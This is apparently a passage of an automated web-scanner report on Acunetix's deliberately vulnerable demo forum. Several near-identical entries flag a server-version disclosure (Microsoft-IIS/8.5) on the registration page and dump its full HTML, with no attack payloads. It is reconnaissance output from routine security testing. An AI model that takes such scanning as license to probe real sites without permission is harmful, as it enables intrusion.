Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
